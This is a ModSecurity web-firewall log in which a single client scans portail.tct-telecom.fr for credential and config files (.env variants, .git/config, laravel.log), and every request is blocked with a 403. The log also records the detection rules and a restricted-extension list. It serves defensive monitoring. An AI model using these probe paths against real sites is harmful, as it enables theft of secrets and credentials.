[Mon May 11 12:15:05.338859 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.213.174.51:41094] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agGsKb4KNmD_mZ_vlf9BUwAAAEk"]
[Mon May 11 12:15:05.339533 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.213.174.51:41258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agGsKZkIEwRJMyDaV55WqAAAAUc"]
[Mon May 11 12:15:05.339698 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.213.174.51:41258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agGsKZkIEwRJMyDaV55WqAAAAUc"]
[Mon May 11 12:15:05.339988 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.213.174.51:41228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agGsKZkIEwRJMyDaV55WqgAAAUY"]
[Mon May 11 12:15:05.340091 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.213.174.51:41146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agGsKUYQeUtAPynIs6xhHAAAAAU"]
[Mon May 11 12:15:05.340265 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.213.174.51:41146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agGsKUYQeUtAPynIs6xhHAAAAAU"]
[Mon May 11 12:15:05.340377 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.213.174.51:41286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agGsKRjZymfuKpjWXeiFRgAAAMc"]
[Mon May 11 12:15:05.340393 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.213.174.51:41228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agGsKZkIEwRJMyDaV55WqgAAAUY"]
[Mon May 11 12:15:05.340411 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.213.174.51:41180] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agGsKRjZymfuKpjWXeiFRwAAANU"]
[Mon May 11 12:15:05.340551 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.213.174.51:41286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agGsKRjZymfuKpjWXeiFRgAAAMc"]
[Mon May 11 12:15:05.340555 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.213.174.51:41172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agGsKWS6k_SCYd1AVZq3MgAAAQo"]
[Mon May 11 12:15:05.340730 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.213.174.51:41196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agGsKWS6k_SCYd1AVZq3NAAAAQY"]
[Mon May 11 12:15:05.340794 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.213.174.51:41210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agGsKZkIEwRJMyDaV55WqQAAAVI"]
[Mon May 11 12:15:05.340818 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.213.174.51:41180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agGsKRjZymfuKpjWXeiFRwAAANU"]
[Mon May 11 12:15:05.341643 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.213.174.51:41196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agGsKWS6k_SCYd1AVZq3NAAAAQY"]
[Mon May 11 12:15:05.341909 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.213.174.51:41216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agGsKRjZymfuKpjWXeiFSQAAAMk"]
[Mon May 11 12:15:05.342006 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.213.174.51:41286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agGsKRjZymfuKpjWXeiFRgAAAMc"]
[Mon May 11 12:15:05.342060 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.213.174.51:41216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agGsKRjZymfuKpjWXeiFSQAAAMk"]
[Mon May 11 12:15:05.342137 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.213.174.51:41094] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agGsKb4KNmD_mZ_vlf9BUwAAAEk"]
[Mon May 11 12:15:05.342241 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.213.174.51:41180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agGsKRjZymfuKpjWXeiFRwAAANU"]
[Mon May 11 12:15:05.342261 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.213.174.51:41272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agGsKb4KNmD_mZ_vlf9BVgAAAEc"]
[Mon May 11 12:15:05.342661 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.213.174.51:41258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agGsKZkIEwRJMyDaV55WqAAAAUc"]
[Mon May 11 12:15:05.342712 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.213.174.51:41160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agGsKb4KNmD_mZ_vlf9BVAAAAEM"]
[Mon May 11 12:15:05.342827 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.213.174.51:41146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agGsKUYQeUtAPynIs6xhHAAAAAU"]
[Mon May 11 12:15:05.342894 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.213.174.51:41160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agGsKb4KNmD_mZ_vlf9BVAAAAEM"]
[Mon May 11 12:15:05.342918 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.213.174.51:41300] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agGsKRjZymfuKpjWXeiFSAAAAMg"]
[Mon May 11 12:15:05.342934 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.213.174.51:41272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agGsKb4KNmD_mZ_vlf9BVgAAAEc"]
[Mon May 11 12:15:05.343043 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.213.174.51:41228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agGsKZkIEwRJMyDaV55WqgAAAUY"]
[Mon May 11 12:15:05.343081 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.213.174.51:41300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agGsKRjZymfuKpjWXeiFSAAAAMg"]
[Mon May 11 12:15:05.343110 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.213.174.51:41120] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "portail.tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agGsKUYQeUtAPynIs6xhHgAAABU"]
[Mon May 11 12:15:05.343241 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.213.174.51:41268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agGsKUYQeUtAPynIs6xhHQAAAAk"]
[Mon May 11 12:15:05.343442 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.213.174.51:41120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agGsKUYQeUtAPynIs6xhHgAAABU"]
[Mon May 11 12:15:05.343538 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.213.174.51:41268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agGsKUYQeUtAPynIs6xhHQAAAAk"]
[Mon May 11 12:15:05.343613 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.213.174.51:41216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agGsKRjZymfuKpjWXeiFSQAAAMk"]
[Mon May 11 12:15:05.343972 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.213.174.51:41196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agGsKWS6k_SCYd1AVZq3NAAAAQY"]
[Mon May 11 12:15:05.344008 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.213.174.51:41300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agGsKRjZymfuKpjWXeiFSAAAAMg"]
[Mon May 11 12:15:05.344064 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.213.174.51:41168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agGsKURdw2n9wv6Ai48P5wAAAIA"]
[Mon May 11 12:15:05.344168 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.213.174.51:41272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agGsKb4KNmD_mZ_vlf9BVgAAAEc"]
[Mon May 11 12:15:05.344337 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.213.174.51:41168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agGsKURdw2n9wv6Ai48P5wAAAIA"]
